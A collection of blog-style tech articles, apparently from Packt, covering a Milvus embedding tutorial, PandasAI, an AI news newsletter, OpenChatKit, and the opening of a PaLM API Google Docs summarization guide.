    connections,
    utility,
    FieldSchema, CollectionSchema, DataType,
    Collection,
)
```

Here, we're importing all the necessary libraries for our task: numpy and torch for mathematical operations and transformations, transformers for language-model-related tasks, and pymilvus for interacting with the Milvus server.

The next code block sets up the transformer model and lists the sentences for which we will generate embeddings. We specify a model checkpoint ("sentence-transformers/all-MiniLM-L6-v2") that serves as our base model for sentence embeddings, then define a list of sentences to embed. The tokenizer converts the sentences into tokens suitable for the model, and the model uses those tokens to generate embeddings:

```python
# Transformer model checkpoint
model_ckpt = "sentence-transformers/all-MiniLM-L6-v2"

# Sentences for which we will compute embeddings
sentences = [
    "I took my dog for a walk",
    "Today is going to rain",
    "I took my cat for a walk",
]

# Initialize tokenizer and model
tokenizer = AutoTokenizer.from_pretrained(model_ckpt)
model = AutoModel.from_pretrained(model_ckpt)
```

We've obtained token embeddings, but we need to aggregate them to obtain sentence-level embeddings. For this, we use a mean pooling operation.

Mean Pooling Function Definition

This function aggregates the token embeddings into sentence embeddings. The token embeddings and the attention mask (which indicates which tokens are not padding and should be considered for pooling) are passed as inputs. The function performs a weighted average of the token embeddings according to the attention mask, ignoring padding tokens, and returns the aggregated sentence embeddings:

```python
# Mean pooling function to aggregate token embeddings into sentence embeddings
def mean_pooling(model_output, attention_mask):
    token_embeddings = model_output.last_hidden_state
    input_mask_expanded = (
        attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
    )
    return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(
        input_mask_expanded.sum(1), min=1e-9
    )
```

Generating Sentence Embeddings

This snippet tokenizes the sentences, padding and truncating them as necessary, and uses the transformer model to generate token embeddings. The token embeddings are pooled with the mean pooling function to create sentence embeddings, which are normalized to ensure consistency and finally converted to Python lists to make them compatible with Milvus:

```python
# Tokenize the sentences and compute their embeddings
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors="pt")
with torch.no_grad():
    model_output = model(**encoded_input)
sentence_embeddings = mean_pooling(model_output, encoded_input["attention_mask"])

# Normalize the embeddings
sentence_embeddings = F.normalize(sentence_embeddings, p=2, dim=1)

# Convert the sentence embeddings into a format suitable for Milvus
embeddings = sentence_embeddings.numpy().tolist()
```

With the embeddings processed and ready for insertion, we can now interact with Milvus.

Inserting Vector Embeddings into Milvus

We connect to our locally deployed Milvus server, define a schema for our data, and create a collection in the Milvus database to store our sentence embeddings. The schema includes a primary key field, a field for the sentences, and a field for the sentence embeddings:

```python
# Establish a connection to the Milvus server
connections.connect("default", host="localhost", port="19530")

# Define the schema for our collection
fields = [
    FieldSchema(name="pk", dtype=DataType.INT64, is_primary=True, auto_id=True),
    FieldSchema(name="sentences", dtype=DataType.VARCHAR, is_primary=False,
                description="The actual sentences", max_length=256),
    FieldSchema(name="embeddings", dtype=DataType.FLOAT_VECTOR, is_primary=False,
                description="The sentence embeddings", dim=sentence_embeddings.size()[1])
]
schema = CollectionSchema(fields, "A collection to store sentence embeddings")
```

With the connection established and the schema defined, we can create our collection, insert our data, and build an index to enable efficient search operations.

Create Collection, Insert Data, and Create Index

We first create the collection in Milvus using the schema, organize our data to match it, and insert the data into the collection. Primary keys are generated as auto IDs, so we don't need to supply them. After the data is inserted, we create an index on the embeddings to optimize search operations, and finally print the number of entities in the collection to confirm the insertion succeeded:

```python
# Create the collection in Milvus
sentence_embeddings_collection = Collection("sentence_embeddings", schema)

# Organize our data to match our collection's schema
entities = [
    sentences,   # The actual sentences
    embeddings,  # The sentence embeddings
]

# Insert our data into the collection
insert_result = sentence_embeddings_collection.insert(entities)

# Create an index to make future search queries faster
index = {
    "index_type": "IVF_FLAT",
    "metric_type": "L2",
    "params": {"nlist": 128},
}
sentence_embeddings_collection.create_index("embeddings", index)

print(f"Number of entities in Milvus: {sentence_embeddings_collection.num_entities}")
```

This way, the sentences and their corresponding embeddings are stored in a Milvus collection, ready to be used for similarity searches or other tasks.

Search Based on Vector Similarity

Now that we've stored our embeddings in Milvus, let's make use of them by searching for similar vectors in our collection. Before conducting a search or a query, the collection's data must be loaded into memory:

```python
# Load the data into memory
sentence_embeddings_collection.load()
```

The search parameters specify the metric used to calculate similarity (L2 distance in this case) and the number of clusters to examine during the search. Here we search for the entries most similar to the last two embeddings in our list, limit the results to the top 3 matches, and print the corresponding sentences:

```python
# Vectors to search
vectors_to_search = embeddings[-2:]
search_params = {
    "metric_type": "L2",
    "params": {"nprobe": 10},
}

# Perform the search
result = sentence_embeddings_collection.search(vectors_to_search, "embeddings",
                                               search_params, limit=3,
                                               output_fields=["sentences"])

# Print the search results
for hits in result:
    for hit in hits:
        print(f"hit: {hit}, sentence field: {hit.entity.get('sentences')}")
```

Once we're done with our data, it's good practice to clean up. Next, we delete entities from our collection using their primary keys.

Delete Entities by Primary Key

This code first gets the primary keys of the entities we want to delete (the first two in our collection). We query the collection before the deletion to show the entities that will be deleted, perform the deletion, and run the same query afterwards to confirm that the entities have been deleted:

```python
# Get the primary keys of the entities we want to delete
ids = insert_result.primary_keys
expr = f'pk in [{ids[0]}, {ids[1]}]'

# Query before deletion
result = sentence_embeddings_collection.query(expr=expr, output_fields=["sentences", "embeddings"])
print(f"Query before delete by expr=`{expr}` -> result: \n-{result[0]}\n-{result[1]}\n")

# Delete entities
sentence_embeddings_collection.delete(expr)

# Query after deletion
result = sentence_embeddings_collection.query(expr=expr, output_fields=["sentences", "embeddings"])
print(f"Query after delete by expr=`{expr}` -> result: {result}\n")
```

Finally, we drop the entire collection from the Milvus server:

```python
# Drop the collection
utility.drop_collection("sentence_embeddings")
```

Conclusion

Congratulations on completing this hands-on tutorial with Milvus! You've learned how to harness the power of an open-source vector database that simplifies and accelerates AI and ML applications. Throughout this journey, you set up Milvus locally using Docker Compose, transformed sentences into high-dimensional embeddings, and conducted vector similarity searches for practical use cases.

Milvus' advanced indexing techniques have empowered you to efficiently store, search, and analyze large volumes of vector data. Its user-friendly design and seamless integration capabilities ensure that you can leverage its powerful features without unnecessary complexity. As you continue exploring Milvus, you'll uncover even more possibilities for its application in diverse fields, such as recommendation systems, image recognition, and natural language processing. The high-performance similarity search and analytics offered by Milvus open doors to cutting-edge AI-driven solutions.

With your newfound expertise in Milvus, you are equipped to embark on your own AI adventures, leveraging the potential of vector databases to tackle real-world challenges. Continue experimenting, innovating, and building AI-driven applications that push the boundaries of what's possible. Happy coding!

Author Bio

Alan Bernardo Palacio is a data scientist and an engineer with vast experience in different engineering fields. His focus has been the development and application of state-of-the-art data products and algorithms in several industries. He has worked for companies such as Ernst and Young and Globant, and now holds a data engineer position at Ebiquity Media, helping the company create a scalable data pipeline. Alan graduated with a Mechanical Engineering degree from the National University of Tucuman in 2015, participated as a founder in startups, and later earned a Master's degree from the faculty of Mathematics at the Autonomous University of Barcelona in 2017. Originally from Argentina, he now works and resides in the Netherlands.

LinkedIn


Revolutionizing Data Analysis with PandasAI

Rohan Chikorde
18 Sep 2023
7 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights and books. Don't miss out – sign up today!IntroductionData analysis plays a crucial role in extracting meaningful insights from raw data, driving informed decision-making in various fields. Python's Pandas library has long been a go-to tool for data manipulation and analysis. Now, imagine enhancing Pandas with the power of Generative AI, enabling data analysis to become conversational and intuitive. Enter PandasAI, a Python library that seamlessly integrates Generative AI capabilities into Pandas, revolutionizing the way we interact with data.PandasAI is designed to bridge the gap between traditional data analysis workflows and the realm of artificial intelligence. By combining the strengths of Pandas and Generative AI, PandasAI empowers users to engage in natural language conversations with their data. This innovative library brings a new level of interactivity and flexibility to the data analysis process.With PandasAI, you can effortlessly pose questions to your dataset using human-like language, transforming complex queries into simple conversational statements. The library leverages machine learning models to interpret and understand these queries, intelligently extracting the desired insights from the data. This conversational approach eliminates the need for complex syntax and allows users, regardless of their technical background, to interact with data in a more intuitive and user-friendly way.Under the hood, PandasAI combines the power of natural language processing (NLP) and machine learning techniques. By leveraging pre-trained models, it infers user intent, identifies relevant data patterns, and generates insightful responses. Furthermore, PandasAI supports a wide range of data analysis operations, including data cleaning, aggregation, visualization, and more. It seamlessly integrates with existing Pandas workflows, making it a versatile and valuable addition to any data scientist or analyst's toolkit.In this comprehensive blog post, we will first cover how to install and configure PandasAI, followed by detailed usage examples to demonstrate its capabilities.Installing and Configuring PandasAIPandasAI can be easily installed using pip, Python's package manager:pip install pandasaiThis will download and install the latest version of the PandasAI package along with any required dependencies.Next, you need to configure credentials for the AI engine that will power PandasAI's NLP capabilities:from pandasai.llm.openai import OpenAI openai_api_key = "sk-..." llm = OpenAI(api_token=openai_api_key) ai = PandasAI(llm)PandasAI offers detailed documentation on how to get API keys for services like OpenAI and Anthropic.Once configured, PandasAI is ready to supercharge your data tasks through the power of language. Let's now see it in action through some examples.Intuitive Data Exploration Using Natural LanguageA key strength of PandasAI is enabling intuitive data exploration using plain English. 
Intuitive Data Exploration Using Natural Language

A key strength of PandasAI is enabling intuitive data exploration using plain English. Consider this sample data:

data = pd.DataFrame({
    'Product': ['A', 'B', 'C'],
    'Sales': [100, 200, 50],
    'Region': ['East', 'West', 'West']
})
ai.init(data)

You can now ask questions about this data conversationally:

ai.run("Which region had the highest sales?")
ai.run("Plot sales by product as a bar chart ordered by sales")

PandasAI will automatically generate relevant summaries, plots, and insights from the data based on the natural language prompts.

Automating Complex Multi-Step Data Pipelines

PandasAI also excels at automating relatively complex multi-step analytical data workflows:

ai.run("""
    Load sales and inventory data
    Join tables on product_id
    Impute missing values
    Remove outliers
    Calculate inventory turnover ratio
    Segment products into ABC categories
""")

This eliminates tedious manual coding effort with Pandas.

Unified Analysis across Multiple Datasets

For real-world analysis, PandasAI can work seamlessly across multiple datasets:

sales = pd.read_csv("sales.csv")
product = pd.read_csv("product.csv")
customer = pd.read_csv("customer.csv")

ai.add_frames(sales, product, customer)
ai.run("Join the datasets. Show average order size by customer city.")

This enables deriving unified insights across disconnected data sources.

Building Data-Driven Analytics Applications

Beyond exploration, PandasAI can power analytics apps via Python integration. For instance:

region = input("Enter region: ")
ai.run(f"Compare {region} sales to national average")

This allows creating customizable analytics tools for business users, tailored to their needs. PandasAI can also enable production apps using Streamlit for the UI:

import streamlit as st
from pandasai import PandasAI

region = st.text_input("Enter region:")
...
if region:
    insight = ai.run(f"Analyze {region} sales")
    st.write(insight)

Democratizing Data-Driven Decisions

A key promise of PandasAI is democratizing data analysis by removing coding complexity. This allows non-technical users to independently extract insights through natural language. Data-driven decisions can become decentralized rather than relying on centralized analytics teams, and domain experts can get tailored insights on demand without coding expertise.

Real-World Applications

Let's explore some real-world applications of PandasAI to understand how it can benefit various industries:

Finance

Financial analysts can use PandasAI to quickly analyze stock market data, generate investment insights, and create financial reports. They can ask questions like, "What are the top-performing stocks in the last quarter?" and receive instant answers. For example:

import pandas as pd
from pandasai import PandasAI

stocks = pd.read_csv("stocks.csv")
ai = PandasAI(model="codex")
ai.init(stocks)

ai.run("What were the top 5 performing stocks last quarter?")
ai.run("Compare revenue growth across technology and healthcare stocks")
ai.run("Which sectors saw the most upside surprises in earnings last quarter?")

Healthcare

Healthcare professionals can leverage PandasAI to analyze patient data, track disease trends, and make informed decisions about patient care. They can ask questions like, "What are the common risk factors for a particular disease?" and gain valuable insights.

Marketing

Marketers can use PandasAI to analyze customer data, segment audiences, and optimize marketing strategies. They can ask questions like, "Which marketing channels have the highest conversion rates?" and fine-tune their campaigns accordingly.
E-commerce

E-commerce businesses can benefit from PandasAI by analyzing sales data, predicting customer behavior, and optimizing inventory management. They can ask questions like, "What products are likely to be popular next month?" and plan their stock accordingly.

Conclusion

PandasAI represents an exciting glimpse into the future of data analysis driven by AI advancement. By automating the tedious parts of data preparation and manipulation, PandasAI allows data professionals to focus on high-value tasks - framing the right questions, interpreting insights, and telling impactful data stories.

Its natural language interface also promises to open up data exploration and analysis to non-technical domain experts. Rather than writing code, anyone can derive tailored insights from data by simply asking questions in plain English.

As AI continues progressing, we can expect PandasAI to become even more powerful and nuanced in its analytical abilities over time. It paves the path for taking data science from simple pattern recognition to deeper knowledge generation using machines that learn, reason, and connect concepts.

While early in its development, PandasAI offers a taste of what is possible when the foundations of data analysis are reimagined using AI. It will be fascinating to see how this library helps shape and transform the analytics landscape in the coming years. For forward-thinking data professionals, the time to embrace its possibilities is now.

In summary, by synergizing the strengths of Pandas and large language models, PandasAI promises to push the boundaries of what is possible in data analysis today. It represents an important milestone in the AI-driven evolution of the field.

Author Bio

Rohan Chikorde is an accomplished AI Architect professional with a post-graduate in Machine Learning and Artificial Intelligence. With almost a decade of experience, he has successfully developed deep learning and machine learning models for various business applications. Rohan's expertise spans multiple domains, and he excels in programming languages such as R and Python, as well as analytics techniques like regression analysis and data mining. In addition to his technical prowess, he is an effective communicator, mentor, and team leader. Rohan's passion lies in machine learning, deep learning, and computer vision.

LinkedIn

AI_Distilled #18: Oracle’s Clinical Digital Assistant, Google DeepMind's AlphaMissense, AI-Powered Stable Audio, Prompt Lifecycle, 3D Gaussian Splatting

Merlyn Shelley
21 Sep 2023
12 min read
👋 Hello,

"A computer would deserve to be called intelligent if it could deceive a human into believing that it was human." - Alan Turing, Visionary Computer Scientist.

This week, we begin by spotlighting Turing's test, a crucial concept in computer science. It sparks discussions about how AI emulates human intelligence, ultimately elevating productivity and creativity. A recent Harvard study revealed how AI improves worker productivity, reducing task completion time by 25% while also improving quality by 40%. A study with 758 Boston Consulting Group consultants revealed that GPT-4 boosted productivity by 12.2% on tasks it could handle.

Welcome to AI_Distilled #18, your ultimate source for everything related to AI, GPT, and LLMs. In this edition, we'll talk about OpenAI expanding to the EU with a Dublin office and key hires, AI-powered Stable Audio transforming text into high-quality music, a Bain study predicting how generative AI will dominate game development in 5-10 years, and Oracle introducing an AI-powered clinical digital assistant for healthcare. A fresh batch of AI secret knowledge and tutorials is here too! Look out for a comprehensive guide to the prompt lifecycle, an exploration of LLM selection and evaluation, a primer on 3D Gaussian splatting (rasterization and its future in graphics), and a step-by-step guide to text generation with GPT using the Hugging Face Transformers library in Python.

In addition, we're showcasing an article by our author Ben Auffarth about LangChain, offering a sneak peek into our upcoming virtual conference.

Writer's Credit: Special shout-out to Vidhu Jain for their valuable contribution to this week's newsletter content!

Cheers,
Merlyn Shelley
Editor-in-Chief, Packt

⚡ TechWave: AI/GPT News & Analysis

OpenAI Expands to EU with Dublin Office and Key Hires: The ChatGPT creator is opening its first European Union office in Dublin, signaling its readiness for upcoming AI regulatory challenges. This move follows OpenAI's announcement of its third office, with locations in San Francisco and London. The expansion into Ireland is strategically significant, as many tech companies choose it as a hub to engage with European regulators and clients while benefiting from favorable tax rates. OpenAI is actively hiring for positions in Dublin, including an associate general counsel, policy and partnerships lead, privacy program manager, software engineer focused on privacy, and a media relations lead. This expansion highlights OpenAI's commitment to addressing privacy concerns, especially in the EU, where ChatGPT faced scrutiny and regulatory actions related to data protection.

AI-Powered Stable Audio Transforms Text into High-Quality Music: Stability AI has unveiled Stable Audio, an AI model capable of converting text descriptions into stereo 44.1 kHz music and sound effects. This breakthrough technology raises the potential of AI-generated audio rivaling human-made compositions. Stability AI collaborated with AudioSparx, incorporating over 800,000 audio files and text metadata into the model, enabling it to mimic specific sounds based on text commands. Stable Audio operates efficiently, rendering 95 seconds of 16-bit stereo audio at 44.1 kHz in under a second on an Nvidia A100 GPU. It comes with free and Pro plans, offering users the ability to generate music of varying lengths and quantities, marking a significant advancement in AI-generated audio quality.
Oracle Introduces AI-Powered Clinical Digital Assistant for Healthcare: Oracle has unveiled its AI-powered Clinical Digital Assistant to enhance electronic health record (EHR) solutions in healthcare. This innovation aims to automate administrative tasks for caregivers, allowing them to focus on patient care, and addresses concerns related to the adoption of generative AI technologies in healthcare. The assistant offers multimodal support, responding to both text and voice commands and streamlining tasks such as accessing patient data and prescriptions. It remains active during appointments, providing relevant information and suggesting actions. Patients can also interact with it for appointment scheduling and medical queries. Oracle plans a full rollout of capabilities over the next year.

Generative AI to Dominate Game Development in 5-10 Years, Says Bain Study: A study by global consulting firm Bain & Company predicts that generative AI will account for more than 50% of game development in the next 5 to 10 years, up from less than 5% currently. The research surveyed 25 gaming executives worldwide, revealing that most believe generative AI will enhance game quality and expedite development, but only 20% think it will reduce costs. Additionally, 60% don't expect generative AI to significantly alleviate the talent shortage in the gaming industry, emphasizing the importance of human creativity. The study highlights that generative AI should complement human creativity rather than replace it.

Google DeepMind's AI Program, AlphaMissense, Predicts Harmful DNA Mutations: Researchers at Google DeepMind have developed AlphaMissense, an artificial intelligence program that can predict whether genetic mutations are harmless or likely to cause diseases, with a focus on missense mutations, where a single letter is misspelled in the DNA code. AlphaMissense assessed 71 million single-letter mutations affecting human proteins, determining that 57% were likely harmless and 32% likely harmful, while remaining uncertain about the rest. The program's predictions have been made available to geneticists and clinicians to aid research and diagnosis. AlphaMissense performs better than current programs, potentially helping identify disease-causing mutations and guiding treatment.

📥 Feedback on the Weekly Edition

What do you think of this issue and our newsletter? Please consider taking the short survey below to share your thoughts, and you will get a free PDF of "The Applied Artificial Intelligence Workshop" eBook upon completion. Complete the Survey. Get a Packt eBook for Free!

🔮 Looking for a New Book from Packt's Expert Community?

Splunk 9.x Enterprise Certified Admin Guide - By Srikanth Yarlagadda

If Splunk is a part of your professional toolkit, consider exploring the Splunk 9.x Enterprise Certified Admin Guide. In an era where the IT sector's demand for Splunk expertise is consistently increasing, this resource proves invaluable. It comprehensively addresses essential aspects of Splunk Enterprise, encompassing installation, license management, user and forwarder administration, index creation, configuration file setup, data input handling, field extraction, and beyond. Moreover, the inclusion of self-assessment questions facilitates a thorough understanding, rendering it an indispensable guide for Splunk Enterprise administrators aiming to excel in their field. Interested in a sneak peek of Chapter 1 without any commitment? Simply click the button below to access it. Read through Chapter 1, unlocked here...
🌟 Secret Knowledge: AI/LLM Resources

Understanding the Prompt Lifecycle: A Comprehensive Guide: A step-by-step guide to the prompt lifecycle, which is crucial for effective prompt engineering in AI applications. The guide covers four main stages: Design & Experiment, Differentiate & Personalize, Serve & Operate, and Analyze Feedback & Adapt. In each stage, you'll learn how to design, differentiate, serve, and adapt prompts effectively, along with the specific tools required. Additionally, the post addresses the current state of tooling solutions for prompt lifecycle management and highlights the existing gaps in prompt engineering tooling.

Exploring LLM Selection and Evaluation: A Comprehensive Guide: In this post, you'll discover a comprehensive guide to selecting and evaluating LLMs. The guide delves into the intricate process of choosing the right LLM for your specific task and provides valuable insights into evaluating their performance effectively. By reading this post, you can expect to gain a thorough understanding of the criteria for LLM selection, the importance of evaluation metrics, and practical tips for making informed decisions when working with these powerful language models.

A Primer on 3D Gaussian Splatting: Rasterization and Its Future in Graphics: In this post, you'll delve into the world of 3D Gaussian splatting, a rasterization technique with promising implications for graphics. You'll explore the core concept of 3D Gaussian splatting, which involves representing scenes using Gaussians instead of triangles. The post guides you through the entire process, from Structure from Motion (SfM) to converting points to Gaussians and training the model for optimal results. It also touches on the importance of differentiable Gaussian rasterization.

How to Build a Multi-GPU System for Deep Learning in 2023: A Step-by-Step Guide: Learn how to construct a multi-GPU system tailored for deep learning while staying within budget constraints. The guide begins by delving into crucial GPU considerations, emphasizing the importance of VRAM, performance (evaluated via FLOPS and tensor cores), slot width, and power consumption. It offers practical advice on choosing the right GPU for your budget. The post then moves on to selecting a compatible motherboard and CPU, paying special attention to PCIe lanes and slot spacing. The guide also covers RAM, disk space, power supply, and PC case considerations, offering insights into building an efficient multi-GPU system.

✨ Expert Insights from Packt Community

This week's featured article is written by Ben Auffarth, the Head of Data Science at loveholidays.

LangChain provides an intuitive framework that makes it easier for AI developers, data scientists, and even those new to NLP technology to create applications using LLMs.

What can I build with LangChain?

LangChain empowers various NLP use cases such as virtual assistants, content generation models for summaries or translations, question answering systems, and more. It has been used to solve a variety of real-world problems. For example, LangChain has been used to build chatbots, question answering systems, and data analysis tools, and it has been applied in a number of different domains, including healthcare, finance, and education. You can build a wide variety of applications with LangChain, including:

Chatbots: It can be used to build chatbots that interact with users in a natural way.
Question answering: LangChain can be used to build question answering systems that can answer questions about a variety of topics.

Data analysis: You can use it for automated data analysis and visualization to extract insights.

Code generation: You can set up software pair-programming assistants that help solve business problems.

And much more!

This is an excerpt from the author's upcoming book, Generative AI with LangChain, from Packt. If you're intrigued by this, we invite you to join us at our upcoming virtual conference for an in-depth exploration of LangChain and a better understanding of how to responsibly apply Large Language Models (LLMs) and move beyond merely producing statistically driven responses. The author will then take you on the practical journey of crafting your own chatbot, akin to the capabilities of ChatGPT. Missed the Early Bird Special offer for the big event? No worries! You can still save 40% by booking your seat now. Reserve your seat at 40% off.

💡 Masterclass: AI/LLM Tutorials

Learn How to Orchestrate Ray-Based ML Workflows with Amazon SageMaker Pipelines: Discover the benefits of combining Ray and Amazon SageMaker for distributed ML in this comprehensive guide. Understand how Ray, an open-source distributed computing framework, simplifies distributed ML tasks, and how SageMaker seamlessly integrates with it. This post provides a step-by-step tutorial on building and deploying a scalable ML workflow using these tools, covering data ingestion, data preprocessing with Ray Dataset, model training, hyperparameter tuning with XGBoost-Ray, and more. You'll also explore how to orchestrate these steps using SageMaker Pipelines, enabling efficient and automated ML workflows. Dive into the detailed code snippets and unleash the potential of your ML projects.

Building and Deploying Tool-Using LLM Agents with AWS SageMaker JumpStart Foundation Models: Discover how to create and deploy LLM agents with extended capabilities, including access to external tools and self-directed task execution. This post introduces LLM agents and guides you through building and deploying an e-commerce LLM agent using Amazon SageMaker JumpStart and AWS Lambda. This agent leverages tools to enhance its functionality, such as answering queries about returns and order updates. The architecture involves a Flan-UL2 model deployed as a SageMaker endpoint, data retrieval tools built with AWS Lambda, and integration with Amazon Lex for use as a chatbot.

Step-by-Step Guide to Text Generation with GPT using the Hugging Face Transformers Library in Python: In this post, you'll learn how to use the Hugging Face Transformers library for text generation and natural language processing without the need for OpenAI API keys. The Hugging Face Transformers library offers a range of models, including GPT-2, GPT-Neo, T5, BERT, and more, each with unique characteristics and use cases. You'll explore how to install the required libraries, choose a pretrained language model, and generate text based on a prompt or context using Python and the Flask framework. This comprehensive guide will enable you to implement text generation applications with ease, making AI-powered interactions accessible to users.
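As a quick taste of that tutorial's approach, here is a minimal text-generation sketch using the Transformers pipeline API; the model choice and generation settings below are illustrative rather than taken from the tutorial itself.

from transformers import pipeline

# Load a small, freely available GPT-style model; larger models
# follow the same interface but need more memory.
generator = pipeline("text-generation", model="gpt2")

result = generator(
    "Large language models are",
    max_new_tokens=40,        # cap the length of the continuation
    num_return_sequences=1,   # ask for a single completion
)
print(result[0]["generated_text"])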
💬 AI_Distilled User Insights Space

Would you like to participate in our user feedback interview to shape AI_Distilled's content and address your professional challenges? Share your content requirements and ideas in 15 simple questions. Plus, be among the first 25 respondents to receive a free Packt credit for claiming a book of your choice from our vast digital library. Don't miss this chance to improve the newsletter and expand your knowledge. Join us today! Share Your Insights Now!

🚀 HackHub: Trending AI Tools

ise-uiuc/Repilot: Patch generation tool designed for Java, based on large language models and code completion engines.

turboderp/exllamav2: Early release of an inference library for local LLMs on consumer GPUs, requiring further testing and development.

liuyuan-pal/SyncDreamer: Focuses on creating multiview-consistent images from single-view images.

FL33TW00D/whisper-turbo: Fast, cross-platform Whisper implementation that runs in your browser or Electron app, offering real-time streaming and privacy.

OpenBMB/ChatDev: Virtual software company run by intelligent agents with various roles, aiming to revolutionize programming and study collective intelligence.

OpenChatKit Could be Your Open-Source Alternative to ChatGPT

Julian Melanson
20 Jun 2023
5 min read
It's no surprise that LLMs like ChatGPT and Bard possess impressive capabilities. However, it's important to note that they are proprietary software, subject to restrictions in terms of access and usage due to licensing constraints. Consequently, this limitation has generated significant interest within the open-source community, leading to the development of alternative solutions that emphasize freedom, transparency, and community-driven collaboration.

In recent months, the open-source community Together has introduced OpenChatKit, an alternative to ChatGPT aimed at providing developers with a versatile chatbot solution. OpenChatKit utilizes the GPT-NeoX language model developed by EleutherAI, which consists of an impressive 20 billion parameters, and the model has been fine-tuned specifically for chat use with 43 million instructions. OpenChatKit's performance surpasses the base model on the industry-standard HELM benchmark, making it a promising tool for various applications.

OpenChatKit Components and Capabilities

OpenChatKit is accompanied by a comprehensive toolkit available on GitHub under the Apache 2.0 license. The toolkit includes several key components designed to enhance customization and performance:

Customization recipes: These recipes allow developers to fine-tune the language model for their specific tasks, resulting in higher accuracy and improved performance.

Extensible retrieval system: OpenChatKit enables developers to augment bot responses by integrating information from external sources such as document repositories, APIs, or live-updating data during inference time. This capability enhances the bot's ability to provide contextually relevant and accurate responses.

Moderation model: The toolkit incorporates a moderation model derived from GPT-JT-6B, fine-tuned to filter and determine which questions the bot should respond to. This feature helps ensure appropriate and safe interactions.

Feedback mechanisms: OpenChatKit provides built-in tools for users to give feedback on the chatbot's responses and contribute new datasets. This iterative feedback loop allows for continuous improvement and refinement of the chatbot's performance.

OpenChatKit's Strengths and Limitations

Developers highlight OpenChatKit's strengths in specific tasks such as summarization, contextual question answering, information extraction, and text classification. It excels in these areas, offering accurate and relevant responses. However, OpenChatKit's performance is comparatively weaker on tasks that require handling questions without context, coding, and creative writing - areas where ChatGPT has gained popularity. OpenChatKit may occasionally generate erroneous or misleading responses (hallucinations), a challenge that is also encountered in ChatGPT. Furthermore, OpenChatKit sometimes struggles with smoothly transitioning between conversation topics and may occasionally repeat answers.

Fine-Tuning and Specialized Use Cases

OpenChatKit's performance can be significantly improved by fine-tuning it for specific use cases. Together, the developers are actively working on their own chatbots designed for learning, financial advice, and support requests. By tailoring OpenChatKit to these specific domains, they aim to enhance its capabilities and deliver more accurate and contextually appropriate responses.

Comparing OpenChatKit with ChatGPT

In a brief evaluation, OpenChatKit did not demonstrate the same level of eloquence as ChatGPT.
This discrepancy can partly be attributed to OpenChatKit's response limit of 256 tokens, which is less than the approximately 500 tokens in ChatGPT. As a result, OpenChatKit generates shorter responses. However, OpenChatKit outperforms ChatGPT in terms of response speed, generating replies at a faster rate. Transitioning between different languages does not appear to pose any challenge for OpenChatKit, and it supports formatting options like lists and tables.

The Role of User Feedback in Improvement

Together recognizes the importance of user feedback in enhancing OpenChatKit's performance and plans to leverage it for further improvement. Actively involving users in providing feedback and suggestions ensures that OpenChatKit evolves to meet user expectations and becomes increasingly useful across a wide range of applications.

The Future of Decentralized Training for AI Models

The decentralized training approach employed in OpenChatKit, as previously seen with GPT-JT, represents a potential future for large-scale open-source projects. By distributing the computational load required for training across numerous machines instead of relying solely on a central data center, developers can leverage the combined power of multiple systems. This decentralized approach not only accelerates training but also promotes collaboration and accessibility within the open-source community.

Anticipating Future Developments

OpenChatKit is the pioneer among open-source alternatives to ChatGPT, but it is likely that other similar projects will emerge. Notably, Meta's leaked LLaMA models boast parameter counts three times greater than GPT-NeoX-20B. With these advancements, it is only a matter of time before chatbots based on these models enter the scene.

Getting Started with OpenChatKit

Getting started with the program is simple:

1. Head to https://openchatkit.net/#demo in your browser
2. Read through the guidelines and agree to the Terms & Conditions
3. Type your prompt into the chatbox

Now you can test-drive the program and see how you like it compared to other LLMs.
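If you would rather experiment from code than through the web demo, the underlying chat model is published on Hugging Face. Below is a minimal sketch, assuming the togethercomputer/GPT-NeoXT-Chat-Base-20B checkpoint and the <human>/<bot> turn format described on its model card; note that a 20-billion-parameter model needs a large GPU (or offloading via the accelerate package) to run.

import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "togethercomputer/GPT-NeoXT-Chat-Base-20B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
# device_map="auto" (requires the accelerate package) spreads the
# 20B parameters across whatever devices are available
model = AutoModelForCausalLM.from_pretrained(
    model_id, torch_dtype=torch.float16, device_map="auto"
)

# The model was fine-tuned on dialogues in this <human>/<bot> format
prompt = "<human>: Summarize what OpenChatKit is in one sentence.\n<bot>:"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=64, do_sample=True, temperature=0.7)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))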
Summary

In summation, OpenChatKit presents an exciting alternative to ChatGPT. Leveraging the powerful GPT-NeoX language model and extensive fine-tuning for chat-based interactions, OpenChatKit demonstrates promising capabilities in tasks such as summarization, contextual question answering, information extraction, and text classification. While some limitations exist, such as occasional hallucinations and difficulty transitioning between topics, fine-tuning OpenChatKit for specific use cases significantly improves its performance. With the provided toolkit, developers can customize the chatbot to suit their needs, and user feedback plays a crucial role in the continuous refinement of OpenChatKit. As decentralized training becomes an increasingly prominent approach in open-source projects, OpenChatKit sets the stage for further innovations in the field, while also foreshadowing the emergence of more advanced chatbot models in the future.

Author Bio

Julian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future, and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom, and our interactive lessons help students reinforce their learning with hands-on activities.

No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!

Generate Google Doc summaries using PaLM API and Google Apps Script

Aryan Irani
13 Sep 2023
8 min read
Introduction

In this article, we'll delve into the powerful synergy of the PaLM API and Google Apps Script, unveiling a seamless way to generate concise summaries for your Google Docs. Say goodbye to manual summarization and embrace efficiency as we guide you through the process of simplifying your document management tasks. Let's embark on this journey to streamline your Google Doc summaries and enhance your productivity.

Sample Google Doc

For this blog, we will be using a very simple Google Doc that contains a paragraph we want to summarize. If you want to work with the Google Doc, click here. Once you make a copy of the Google Doc, you have to change the API key in the Google Apps Script code.

Step 1: Get the API key

Currently, the PaLM API hasn't been released for public use, but to access it before everybody else does, you can apply for the waitlist by clicking here. If you want to know more about the process of applying for MakerSuite and the PaLM API, you can check the YouTube tutorial here. Once you have access, we get the API key from the Get API key section of MakerSuite. To get the API key, follow these steps:

1. Go to MakerSuite or click here.
